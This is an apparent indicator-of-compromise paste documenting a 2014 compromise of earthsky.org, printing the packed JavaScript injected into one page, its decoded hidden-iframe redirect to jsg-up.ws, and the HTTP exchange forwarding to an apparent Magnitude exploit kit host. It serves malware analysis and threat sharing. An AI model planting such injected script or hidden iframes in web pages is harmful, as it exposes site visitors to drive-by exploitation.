Advertisement
malwageddon

IOC earthsky.org - 2014-08-27

Aug 27th, 2014
257
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // Example of a webpage containing injected JS - earthsky.org/astronomy-essentials/double-moon-on-august-27
  2.  
  3. // Injected JS
  4.  
  5. <script type="text/javascript">
  6.     eval(function(p, a, c, k, e, r) {
  7.         e = function(c) {
  8.             return c.toString(a)
  9.         };
  10.         if (!''.replace(/^/, String)) {
  11.             while (c--) r[e(c)] = k[c] || e(c);
  12.             k = [
  13.                 function(e) {
  14.                     return r[e]
  15.                 }
  16.             ];
  17.             e = function() {
  18.                 return '\\w+'
  19.             };
  20.             c = 1
  21.         };
  22.         while (c--)
  23.             if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
  24.         return p
  25.     }('b.9(\'<2 4="5://6-7.8/3/?1" a="0" c="0" d="0" e="f: g;"></2>\');', 17, 17, '||iframe|cumba|src|http|jsg|up|ws|write|border|document|width|height|style|visibility|hidden'.split('|'), 0, {}))
  26. </script>
  27.  
  28. // 'eval' results in the following JS command
  29.  
  30. document.write('<iframe src="http://jsg-up.ws/cumba/?1" border="0" width="0" height="0" style="visibility: hidden;"></iframe>');
  31.  
  32. // jsg-up.ws is hosting a malicious TDS and redirects to Magnitude EK landing page
  33.  
  34. GET http://jsg-up.ws/cumba/?1 HTTP/1.1
  35. Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/xaml+xml, application/x-ms-xbap, application/x-ms-application, */*
  36. Referer: http://earthsky.org/astronomy-essentials/double-moon-on-august-27
  37. Accept-Language: en
  38. Accept-Encoding: gzip, deflate
  39. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
  40. Host: jsg-up.ws
  41. Connection: Keep-Alive
  42.  
  43. HTTP/1.1 302 Found
  44. Server: nginx/0.7.67
  45. Date: Wed, 27 Aug 2014 09:58:04 GMT
  46. Content-Type: text/html; charset=utf-8
  47. Connection: keep-alive
  48. X-Powered-By: PHP/5.3.3-7+squeeze17
  49. Expires: Thu, 21 Jul 1977 07:30:00 GMT
  50. Last-Modified: Wed, 27 Aug 2014 09:58:04 GMT
  51. Cache-Control: max-age=0
  52. Pragma: no-cache
  53. Set-Cookie: bb079=a%3A3%3A%7Bs%3A6%3A%22groups%22%3Ba%3A1%3A%7Bi%3A1%3Bi%3A1409133484%3B%7Ds%3A7%3A%22streams%22%3Ba%3A1%3A%7Bi%3A1%3Bi%3A1409133484%3B%7Ds%3A4%3A%22time%22%3Bi%3A1409133484%3B%7D; expires=Sat, 27-Sep-2014 09:58:04 GMT; path=/; domain=.jsg-up.ws
  54. LOCATION: http://0469f.9d.b30503b.2ebac.abb.de6.57.51.44e.nodzkctpc.settledbacked.in/
  55. Vary: Accept-Encoding
  56. Content-Length: 0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement